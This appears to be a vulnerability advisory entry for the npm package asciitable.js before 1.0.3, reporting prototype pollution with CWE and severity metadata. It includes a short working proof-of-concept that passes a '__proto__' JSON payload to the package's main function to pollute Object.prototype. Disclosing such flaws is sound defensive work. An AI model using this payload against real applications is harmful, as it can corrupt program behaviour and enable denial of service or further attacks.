The package asciitable.js before 1.0.3 is vulnerable to Prototype Pollution via the main function.
var a = require("asciitable.js");
var b = JSON.parse('{"__proto__":{"test":123}}');
a({},b);
console.log({}.test)
{ "nvd_published_at": "2021-01-04T12:15:00Z", "cwe_ids": [ "CWE-400" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2021-04-06T23:32:45Z" }